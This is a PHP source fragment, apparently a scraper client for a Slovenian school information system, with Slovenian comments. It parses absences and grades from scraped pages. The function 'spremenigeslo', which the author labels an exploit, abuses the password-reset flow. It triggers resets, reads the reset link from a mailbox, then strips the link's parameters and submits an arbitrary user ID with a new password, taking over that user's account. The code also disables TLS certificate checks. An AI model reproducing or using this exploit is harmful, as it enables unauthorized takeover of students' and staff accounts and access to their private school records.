if(startsWith($sn->getAttribute("id"), "ctl00_ContentPlaceHolder1_gvwIzostankiGroup")) {
$izostanki = array();
foreach($sn->getElementsByTagName('tbody')[0]->getElementsByTagName('tr') as $rn) {
$datum = DOMinnerHTML($rn->getElementsByTagName('td')[0]);
$dat['dan'] = intval(explode(".", $datum)[0]);
$dat['mesec'] = intval(explode(".", $datum)[1]);
$dat['leto'] = intval(explode(".", $datum)[2]);
$predmeti = DOMinnerHTML($rn->getElementsByTagName('td')[2]);
$predmet = explode(", ", $predmeti);
$predm = array();
foreach($predmet as $pr) {
$ime = explode(" (", $pr)[0];
switch(get_string_between($pr, '(<span class="opr', '">')) {
case "0":
$opravicenoopis = "ni obdelano";
break;
case "1":
$opravicenoopis = "opravičeno";
break;
case "2":
$opravicenoopis = "neopravičeno";
break;
case "3":
$opravicenoopis = "ne šteje";
break;
}
$opravicenostatus = intval(get_string_between($pr, '(<span class="opr', '">'));
$ura = intval(get_string_between($pr, '">', '</span>'));
$predm[] = array("ime" => $ime, "opraviceno" => array( "status" => $opravicenostatus, "opis" => $opravicenoopis), "ura" => $ura);
}
$stevilo = intval(DOMinnerHTML($rn->getElementsByTagName('td')[1]));
$izostanki[] = array("datum" => $dat, "stevilo" => $stevilo, "predmeti" => $predm);
}
}
}
return $izostanki;
}
public function resetgeslo($user) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0);
curl_setopt($ch, CURLOPT_COOKIESESSION, true );
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer?
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects?
curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas?
curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version));
curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres?
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response
curl_setopt($ch, CURLOPT_URL, $this->gimsisextresetgeslo);
curl_setopt($ch, CURLOPT_POST, 0);
$resetgeslo_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $resetgeslo_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
$postvars = "";
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') != 'edtGSEUserId') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextresetgeslo);
curl_setopt($ch, CURLOPT_POST, 1);
$postbody = $postvars . urlencode('edtGSEUserId') . '=' . $user;
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$resetgeslo_output = curl_exec($ch);
if(get_string_between($resetgeslo_output, "Uporabnik z vne", "enim uporabni") == "s") {
return -6;
} else {
$odg = get_string_between($resetgeslo_output, "na e-poštni naslov ", ".</span>");
$odg2 = get_string_between($resetgeslo_output, "na e-poštni naslov ", ".</font>");
if(strlen($odg) < strlen($odg2)) return $odg2;
}
}
private function parselastresetemail() {
$path = $this->mailbox."/new";
$latest_ctime = 0;
$latest_filename = '';
$d = dir($path);
while (false !== ($entry = $d->read())) {
$filepath = "{$path}/{$entry}";
// could do also other checks than just checking whether the entry is a file
if (is_file($filepath) && filectime($filepath) > $latest_ctime) {
$latest_ctime = filectime($filepath);
$latest_filename = $entry;
}
}
$fajl = file($this->mailbox."/new/".$latest_filename);
if (!$fajl) return false;
$mejl = preg_replace('/\s+/','',base64_decode(implode("", array_slice($fajl, 1+array_search(1, array_map("strlen", $fajl))))));
$datum = get_string_between($mejl, "o<b>", "ob");
$ura = get_string_between($mejl, "ob", "</b>.");
if (new DateTime > new DateTime($datum." ".$ura)) {
return false;
}
$link = get_string_between($mejl, "a'href='", "'>z");
return $link;
}
public function spremenigeslo($user, $newpass) { // exploit // delam na tem
$plre = $this->parselastresetemail();
while($plre == false) {
$this->resetgeslo($this->adminusername);
$plre = $this->parselastresetemail();
}
/*
$this->cookiedir = '/tmp/'.posix_getuid().'/'.$this->programdomain.'/cookiedir/';
if (!is_dir($this->cookiedir."spremenigeslo")) {
if (!mkdir($this->cookiedir.$this->username, 0700, true)) { // x permišn mora bit', da lahko dela poddirektorije, hence true, hence 0700; group in $
return -5;
}
}
*/
$ch = curl_init();
curl_setopt($ch, CURLOPT_SSLVERSION, CURL_SSLVERSION_TLSv1_0);
curl_setopt($ch, CURLOPT_COOKIESESSION, true );
curl_setopt($ch, CURLOPT_COOKIEJAR, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // cookiejar
curl_setopt($ch, CURLOPT_COOKIEFILE, $this->cookiedir."spremenigeslo"."/cookie.txt" ); // coolie file // this scuks
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_VERBOSE, TRUE);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // return transfer?
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); // follow 3xx redirects?
curl_setopt($ch, CURLOPT_MAXREDIRS, 10); // max 3xx redirectas?
curl_setopt($ch, CURLOPT_USERAGENT, $this->programdomain."/".implode(".", $this->version));
curl_setopt($ch, CURLOPT_AUTOREFERER, 1); // auto send refereres?
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10); // timeout for tcp connection
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // timeout for http response
curl_setopt($ch, CURLOPT_URL, $plre);
curl_setopt($ch, CURLOPT_POST, 0);
$spremenigeslo_init_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $spremenigeslo_init_output );
$searchNode = $xmlDoc->getElementsByTagName( "input" );
$postvars = "";
foreach( $searchNode as $sn ) {
if($sn->getAttribute('name') == 'hfIdUporabnik') {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($user)."&";
} else if($sn->getAttribute("name") == "edtGSEPassword") {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
} else if($sn->getAttribute("name") == "edtGSEPassword2") {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($newpass)."&";
} else {
$postvars .= urlencode($sn->getAttribute('name'))."=".urlencode($sn->getAttribute('value'))."&";
}
}
curl_setopt($ch, CURLOPT_URL, explode("?", $plre)[0]); // <!-- ključ exploita. Server inč ne javka, če GET parametrov ni... 1337 h@x3d xD <3
curl_setopt($ch, CURLOPT_POST, 1);
$postbody = "__EVENTTARGET=&__EVENTARGUMENT=&".substr($postvars, 0, -1); // ker ne rabmo zadnjega &
curl_setopt($ch, CURLOPT_POSTFIELDS, $postbody);
$spremenigeslo_output = curl_exec($ch);
file_put_contents("/tmp/222.html", $postbody);
if(get_string_between($spremenigeslo_output, "Geslo je z", "menjano") == "a") {
return true;
} else {
return false;
}
}
public function fetchocene() {
$ch = $this->login();
if(!curl_getinfo($ch)) {
if(!empty($ch)){return $ch;}else{return -2;}
}
curl_setopt($ch, CURLOPT_URL, $this->gimsisextocene);
curl_setopt($ch, CURLOPT_POST, 0);
$ocene_output = curl_exec($ch);
$xmlDoc = new DOMDocument();
$xmlDoc->loadHTML( $ocene_output );
$spanNode = $xmlDoc->getElementsByTagName( "span" );
$ocene = array();
foreach ($spanNode as $sn) {
if($sn->getAttribute('class') == "txtVOcObd") {
$is = $sn->getElementsByTagName("span")[0]; // innerspan je is, innerspantitle je pa ist, hehe
$ist = explode("\n", $is->getAttribute("title"));
$datum = explode(": ", $ist[0])[1];
$ucitelj = explode(": ", $ist[1])[1];
$predmet = explode(": ", $ist[2])[1];
$ocenjevanje = explode(": ", $ist[3])[1];
$vrsta = explode(": ", $ist[4])[1];
$rok = explode(": ", $ist[5])[1];
$ocena = DOMinnerHTML($is);
if(explode(" ", $is->getAttribute("class"))[1] == "ocVmesna") {
$zacasna = 1;
} else {
$zacasna = 0;
}
$ocenaarray = array(
"datum" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $datum))),
"profesor" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $ucitelj))),
"predmet" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $predmet))),
"naslov" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $ocenjevanje))),
"vrsta" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $vrsta))),
"rok" => str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $rok))),
);
if(sizeof($sn->getElementsByTagName("span")) > 1) { // v kolikor je nova ocena
$ocenaarray["ocena"] = DOMinnerHTML($sn->getElementsByTagName("span")[1]);
if(explode(" ", $sn->getElementsByTagName("span")[1]->getAttribute("class"))[1] == "ocVmesna") {
$ocenaarray["zacasna"] = 1;
} else {
$ocenaarray["zacasna"] = 0;
}
$ocenaarray["ocena"] = intval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $ocenaarray["ocena"]))));
$ocenaarray["zacasna"] = boolval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $ocenaarray["zacasna"]))));
// sedaj pa vpišemo še staro oceno
$ocenaarray["staraocena"] = intval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, DOMinnerHTML($sn->getElementsByTagName("span")[0])))));
if(explode(" ", $sn->getElementsByTagName("span")[0]->getAttribute("class"))[1] == "ocVmesna") {
$zacasnn = true;
} else {
$zacasnn = false;
}
$ocenaarray["starazacasna"] = boolval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $zacasnn))));
} else { // v kolikor ni nove ocene
$ocenaarray["ocena"] = intval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, DOMinnerHTML($sn->getElementsByTagName("span")[0])))));
if(explode(" ", $sn->getElementsByTagName("span")[0]->getAttribute("class"))[1] == "ocVmesna") {
$zacasnn = true;
} else {
$zacasnn = false;
}
$ocenaarray["zacasna"] = boolval(str_replace("\n", null, str_replace("\r", null, str_replace(" ", null, $zacasnn))));
}
$ocene[] = $ocenaarray;
}
}
return $ocene;
}
public function fetchvsasporocila($katera = 0) { // prepočasi
$msgs = null;
foreach($this->fetchsporocilaseznam($katera) as $mesidz) {
$msgs[] = $this->fetchsporocilo($mesidz['id']);
}
return $msgs;
}
}
?>
